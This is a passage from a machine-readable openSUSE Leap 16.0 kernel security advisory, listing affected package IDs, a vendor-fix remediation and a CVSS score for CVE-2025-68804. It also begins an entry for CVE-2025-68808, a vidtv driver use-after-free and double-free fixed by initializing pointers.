"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68804",
"url": "https://www.suse.com/security/cve/CVE-2025-68804"
},
{
"category": "external",
"summary": "SUSE Bug 1256617 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256617"
},
{
"category": "external",
"summary": "SUSE Bug 1256618 for CVE-2025-68804",
"url": "https://bugzilla.suse.com/1256618"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-68804"
},
{
"cve": "CVE-2025-68808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: initialize local pointers upon transfer of memory ownership\n\nvidtv_channel_si_init() creates a temporary list (program, service, event)\nand ownership of the memory itself is transferred to the PAT/SDT/EIT\ntables through vidtv_psi_pat_program_assign(),\nvidtv_psi_sdt_service_assign(), vidtv_psi_eit_event_assign().\n\nThe problem here is that the local pointer where the memory ownership\ntransfer was completed is not initialized to NULL. This causes the\nvidtv_psi_pmt_create_sec_for_each_pat_entry() function to fail, and\nin the flow that jumps to free_eit, the memory that was freed by\nvidtv_psi_*_table_destroy() can be accessed again by\nvidtv_psi_*_event_destroy() due to the uninitialized local pointer, so it\nis freed once again.\n\nTherefore, to prevent use-after-free and double-free vulnerability,\nlocal pointers must be initialized to NULL when transferring memory\nownership.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
